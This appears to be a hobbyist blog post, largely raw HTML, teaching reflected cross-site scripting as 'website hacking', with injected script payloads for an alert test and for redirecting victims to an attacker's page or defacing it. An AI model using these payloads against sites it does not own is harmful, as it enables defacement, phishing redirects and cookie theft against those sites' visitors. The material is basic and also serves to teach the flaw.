<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhurt8oh-qALTZ7c5TR8R_jL755byBm80rXLS9cYL0GykheL7aGCVoepwoSU3peTYSMUYJGl4W5FfsHYQWIRaqrFi5cGLcvw_60YSRVtZ5uwV5yFAc_Ms794h5dEknmVCzAaqoFbv7wKOXL/s1600/xss-threat3.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhurt8oh-qALTZ7c5TR8R_jL755byBm80rXLS9cYL0GykheL7aGCVoepwoSU3peTYSMUYJGl4W5FfsHYQWIRaqrFi5cGLcvw_60YSRVtZ5uwV5yFAc_Ms794h5dEknmVCzAaqoFbv7wKOXL/s1600/xss-threat3.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></span></a></div> <span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">This is the first article on website hacking on my blog. In this tutorial i am going to explain about <span class="Apple-style-span" style="color: red;">CROSS SITE SCRIPTING ATTACK</span>.</span></b><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></b><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><b>Cross-site scripting</b> (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;"><b>Types of XSS vulnerabilities:</b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">1.Persistent</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">2.Non persistent</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">In this post i am going to explain about the non persistent vulnerability.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;"><b>What can a hacker do with this??</b></span><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></b><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">XSS Attacks be used for the following:</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        </span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        •Compromising and Hijacking Accounts</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        •Stealing User Cookies</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        •Defacing Websites</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        •Phishing Attacks</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">        •Posting False or Hostile Content</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><b><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;">Steps to hack</span></b><b><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;">:</span></b><br /><b><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;"><br /></span></b><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">Step 1: Find vulnerability.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">Step 2: Deface.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><b><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium;">Finding out the vulnerability:</span></b><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">1)Find a textbox in the site or something where you can submit text.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhfpbCbFlzEhUExxIvFFg136dKuyQHYyyKJi25P6CTWnwUiwZ9r9V4aTKYI62gPTh8Ef4-JpArPptQcqJgLJwg3g-WLzx14QSgU8W_BOnVFvz2uuB6CxbS3-sB6AYErz0xVDFKeAbhH2NX/s1600/11.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhfpbCbFlzEhUExxIvFFg136dKuyQHYyyKJi25P6CTWnwUiwZ9r9V4aTKYI62gPTh8Ef4-JpArPptQcqJgLJwg3g-WLzx14QSgU8W_BOnVFvz2uuB6CxbS3-sB6AYErz0xVDFKeAbhH2NX/s1600/11.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></span></a></div> <span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">2)Type in the following:</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="color: blue; font-family: Georgia, 'Times New Roman', serif;"><b><script>alert("hackinginception");</script></b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">3)If it is vulnerable it should look like this:</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmXGvm1B9mLODQeoklt4ZxCeMZDZHlSfXXUfAzgcbZvrcAykfm9RJxSjWm1yptdyEDzBKrXSxGc2mk11EG4FJwin9DzdmW-GE0udzjfhSJae2Leld1L795uoWrCaCQwjilryZYO4jSES3Y/s1600/12.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmXGvm1B9mLODQeoklt4ZxCeMZDZHlSfXXUfAzgcbZvrcAykfm9RJxSjWm1yptdyEDzBKrXSxGc2mk11EG4FJwin9DzdmW-GE0udzjfhSJae2Leld1L795uoWrCaCQwjilryZYO4jSES3Y/s1600/12.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></span></a></div> <span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"><b><br /></b></span><br /><span class="Apple-style-span" style="color: red; font-family: Georgia, 'Times New Roman', serif; font-size: medium; line-height: 18px;"><b>Defacing:</b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"><b><br /></b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;">There are some ways to deface a site when you find a XSS vulnerability.</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;">1) Makes A Picture Pop-Up:</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"><br /></span><br /><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="color: blue; font-family: Georgia, 'Times New Roman', serif;"><b>"><script>location="www.website.com/yourdefacepic";</script></b></span></span><br /><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span><br /><span class="Apple-style-span" style="line-height: 18px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">2) Replace The Content Of The Page By An Image:</span></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="color: blue; font-family: Georgia, 'Times New Roman', serif;"><b><img src="yoursite.com/yourdefacepic/></b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">3)Redirect To A Website</span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="color: blue; font-family: Georgia, 'Times New Roman', serif;"><b><script>window.location="http://www.yoursite.com"</script></b></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="color: red; font-size: medium;">NOTE:</span> </span></b><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">Since this is a non-persistent attack,the changes made by you will not affect the website. But the hackers use these vulnerabilities to steal the information of the visitors of those sites. </span></b><br /><b><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">I will write some articles on those topics soon.</span></b><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br /><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">Hope you liked this article... Leave your comments if you have any doubts or suggestions.</span></div> </div> </div>

Hack websites using Cross Site Scripting

This is the first article on website hacking on my blog. In this tutorial i am going to explain about  CROSS SITE SCRIPTING ATTAC...

Read more »